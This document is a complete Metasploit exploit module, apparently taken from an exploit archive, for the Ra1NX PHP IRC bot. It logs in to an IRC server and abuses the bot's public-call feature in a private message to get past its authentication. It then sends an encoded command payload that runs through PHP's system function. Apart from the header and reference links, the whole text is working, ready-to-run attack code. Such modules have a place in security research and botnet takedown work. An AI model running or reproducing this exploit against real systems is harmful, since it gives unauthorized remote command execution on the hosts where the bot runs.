Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution



# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution',
            'Description'    => %q{
                    This module allows remote command execution on the PHP IRC bot Ra1NX by
                    using the public call feature in private message to covertly bypass the
                    authentication system.
                },
            'Author'         =>
                [
                    'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
                    ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
                    ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
                ],
            'Platform'       => [ 'unix', 'win'],
            'Arch'           => ARCH_CMD,
            'Payload'        =>
                {
                    'Space'    => 344,
                    'BadChars' => '',
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                        }
                },
            'Targets'  =>
                [
                    [ 'Ra1NX', { } ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'March 24 2013',
            'DefaultTarget'  => 0))

        register_options(
            [
                Opt::RPORT(6667),
                OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
                OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
                OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
                OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
            ], self.class)
    end

    def check
        connect

        response = register(sock)
        if response =~ /463/ or response =~ /464/
            print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
            return Exploit::CheckCode::Unknown
        end
        confirm_string = rand_text_alpha(8)
        response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
        print response
        quit(sock)
        disconnect

        if response =~ /#{confirm_string}/
            return Exploit::CheckCode::Vulnerable
        else
            return Exploit::CheckCode::Safe
        end
    end

    def send_msg(sock, data)
        sock.put(data)
        data = ""
        begin
            read_data = sock.get_once(-1, 1)
            while not read_data.nil?
                data << read_data
                read_data = sock.get_once(-1, 1)
            end
        rescue EOFError
        end
        data
    end

    def register(sock)
        msg = ""

        if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
            msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
        end

        if datastore['NICK'].length > 9
            nick = rand_text_alpha(9)
            print_error("The nick is longer than 9 characters, using #{nick}")
        else
            nick = datastore['NICK']
        end

        msg << "NICK #{nick}\r\n"
        msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

        response = send_msg(sock,msg)
        return response
    end

    def ra1nx_command(sock)
        encoded = payload.encoded
        command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"
        response = send_msg(sock, command_msg)
        return response
    end

    def quit(sock)
        quit_msg = "QUIT :bye bye\r\n"
        sock.put(quit_msg)
    end

    def exploit
        connect

        print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
        response = register(sock)
        if response =~ /463/ or response =~ /464/
            print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
            return
        end

        print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
        ra1nx_command(sock)

        quit(sock)
        disconnect
    end
end